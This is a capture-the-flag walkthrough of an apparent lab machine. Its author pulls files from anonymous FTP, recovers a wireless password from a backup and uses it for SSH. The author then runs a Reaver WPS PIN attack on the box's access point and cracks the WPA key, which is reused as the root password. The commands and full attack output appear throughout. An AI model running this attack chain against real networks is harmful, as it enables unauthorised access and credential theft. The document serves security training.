Enumeration
nmap
Nmap result is as below.
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 2023 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 2023 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 2023 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 2023 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 2023 employees_wellness.pdf
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open tcpwrapped
1027/tcp filtered IIS
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelCheck FTP and SSH ports are open.
Also, FTP allows anonymous login.
Therefore, login as anonymous.
mget *Download all the files and enumerate the directories and files.
We can see the users in passwd.
netadmin. checked.
In the config directory, we can find wireless information.
There is the password! Let’s try this one for login to ssh.
user flag
ssh netadmin@10.10.11.247And use the password we found.
We’re in!
Privilege escalation
Now, let’s enumerate the directories to find information to escalate privilege.
I tried every directory.
Unfortunately, it seems there’s no clue in the directories.
Let’s try another approach.
Since there were files about wireless interfaces in FTP directories, I checked the wifi settings.
Enumerate wireless interfaces
iwconfig
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
eth0 no wireless extensions.
hwsim0 no wireless extensions.
wlan1 IEEE 802.11 ESSID:"OpenWrt"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:00:00
Bit Rate:5.5 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:8 Missed beacon:0
lo no wireless extensions.
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan0 IEEE 802.11 Mode:Master Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:onI can see some useful information here.
- wlan0 is the master mode. which is an Access point for wireless connections.
- mon0 is the monitor mode. It tests and monitors the activity.
- wlan1 has a familiar SSID OpenWrt! And it is the managed mode meaning it is a wifi client. wlan1 is accessing to 02:00:00:00:00:00. I assume mac address of the wlan0 is 02:00:00:00:00:00.
Let’s investigate further information.
iw dev
phy#2
Interface mon0
ifindex 7
wdev 0x200000002
addr 02:00:00:00:02:00
type monitor
txpower 20.00 dBm
Interface wlan2
ifindex 5
wdev 0x200000001
addr 02:00:00:00:02:00
type managed
txpower 20.00 dBm
phy#1
Unnamed/non-netdev interface
wdev 0x10000001e
addr 42:00:00:00:01:00
type P2P-device
txpower 20.00 dBm
Interface wlan1
ifindex 4
wdev 0x100000001
addr 02:00:00:00:01:00
ssid OpenWrt
type managed
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
phy#0
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBmOk, as I assumed the wlan0 has the address of 02:00:00:00:00:00.
And the channel 1 is being used.
Therefore the image of wifi connections will look like below.
Exploit wireless interface
My next move is to exploit the wlan0 because it is the access point.
Let’s see the detailed information of wlan0.
iw wlan0 info
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
wiphy 0
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBmAlso, I remember there was a mention of the Reaver tool in one of the files found in the FTP service. (MigrateOpenWrt.txt)
Or we can search for a tool using getcap command.
getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+epgetcap command shows the tools having capabilities (permissions) that we can use.
Root flag
See the man page of the Reaver tool.
reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1
-i : interface (Must be a monitor interface)
-b : BSSID
-c : channelExecute the command.
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.Then we can find the password!
Use it to log in as root.
